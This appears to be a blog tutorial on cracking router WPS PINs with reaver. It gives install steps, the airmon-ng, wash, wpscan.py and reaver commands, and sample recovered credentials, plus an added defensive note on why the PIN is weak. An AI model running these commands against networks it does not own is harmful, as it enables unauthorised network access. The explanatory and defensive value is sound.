##DISCLAIMER## – as usual, only use on devices you have approval for or own.
I hadn’t looked much at reaver yet – although I had been following the news since it was released in Dec. Reaver allows you to brute force the 8-digit numeric WPS PIN (the easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers in order to get certification.
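Why an 8-digit PIN is feasible to brute force at all, as an added example (this is not code from the original post and not reaver's own code): in the WPS 1.0 registrar protocol the AP acknowledges the first four digits of the PIN separately from the last four, and the eighth digit is a checksum of the first seven, so the effective search space is 10^4 + 10^3 = 11,000 candidates instead of 10^8. The checksum routine below follows the WPS specification; the PIN 12345670 used in the test is the well-known example PIN from the hostapd sample config, not a value from this post.

```python
# Added example (not from the original post): why the WPS PIN is weak.
# The AP confirms the first half of the PIN before the second half, and
# digit 8 is a checksum of digits 1-7, so the search collapses from
# 10**8 to 10**4 + 10**3 candidates.

def wps_checksum_digit(first_seven: str) -> int:
    """Return the checksum digit the WPS spec appends to a 7-digit PIN body."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    accum = 0
    for i, ch in enumerate(first_seven):
        d = int(ch)
        # digits at positions 1, 3, 5, 7 (1-based) are weighted by 3
        accum += 3 * d if i % 2 == 0 else d
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN (with optional '-' or space) has a correct checksum."""
    pin = pin.replace("-", "").replace(" ", "")
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum_digit(pin[:7]) == int(pin[7])


def wps_search_space() -> dict:
    """Compare the naive PIN space with what the split verification leaves."""
    naive = 10 ** 8             # what an 8-digit PIN looks like on paper
    first_half = 10 ** 4        # digits 1-4, confirmed on their own
    second_half = 10 ** 3       # digits 5-7 free, digit 8 is the checksum
    split = first_half + second_half
    return {"naive": naive, "split": split, "reduction": naive // split}


if __name__ == "__main__":
    print("checksum for 1234567 ->", wps_checksum_digit("1234567"))
    print("12345670 valid ->", is_valid_wps_pin("12345670"))
    print(wps_search_space())
```

Only the checksum and the candidate count are computed here; nothing talks to an AP. The defender's takeaway is that the PIN's length gives no real protection, so the fix is to disable WPS (or at least the external-registrar PIN method) on the router rather than to pick a longer PSK.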
Main tools:
- reaver (cracks the AP) & wash (identifies APs vulnerable to WPS brute forcing)
- the python script wpscan.py (circa 2009) lets you fingerprint the AP (make / model / serial etc) that has WPS enabled
Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash
http://code.google.com/p/reaver-wps/downloads/list
http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Do the install dance on your distro (works on BT5r1) – note the configure script lives in the src directory of the 1.4 tarball:
# tar zxvf reaver-1.4.tar.gz
# cd reaver-1.4/src
# ./configure
# make
# make install
You can also use a fun little python script called wpscan.py (not to be confused with the WordPress tool) to fingerprint the AP
http://www.sourcesec.com/category/tools/
Step 1: Interface into monitor mode
# airmon-ng start wlan0
Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver
# wash -i mon0
Step 3: Fingerprint with wpscan.py
# ./wpscan.py -i mon0
Step 4: run reaver against it, then grab a coffee / lunch / sleep – it can take several hours to brute force the WPS PIN
# reaver -i mon0 -b <AP MAC address> -v
This will [should] result in it returning the PIN & PSK of the WiFi router – you can then simply connect.
WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’